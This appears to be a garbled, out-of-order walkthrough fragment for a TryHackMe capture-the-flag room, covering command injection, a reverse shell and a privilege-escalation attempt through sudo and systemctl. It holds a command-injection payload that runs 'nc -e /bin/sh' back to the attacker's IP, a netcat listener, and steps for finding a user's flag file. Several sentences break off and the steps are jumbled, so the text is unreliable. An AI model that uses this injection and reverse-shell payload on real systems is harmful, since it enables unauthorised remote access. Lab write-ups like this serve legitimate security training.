cct2019 tryhackme

127.0.0.1; nc -e /bin/sh <your_ip> 4444

If -e is not available, use:

Run:

cat /home/mandy/user.txt

Check sudo -l again as mandy – maybe mandy can run something as root.

Check /var/www/html for config files – sometimes credentials are hardcoded.

find / -name user.txt 2>/dev/null

Likely in /home/mandy/user.txt. But you don’t have read access yet.

Step 4 – Privilege Escalation

4.1 Check Sudo Rights

sudo -l

If you see:

Test for :

User www-data may run (ALL, !root) /bin/systemctl

That means www-data can run systemctl as any user.

4.2 Exploit systemctl

Create a service file (e.g., privesc.service):

nc -lvnp 4444

127.0.0.1; id

If you see the output of the id command, the injection works. Use a netcat reverse shell one-liner.
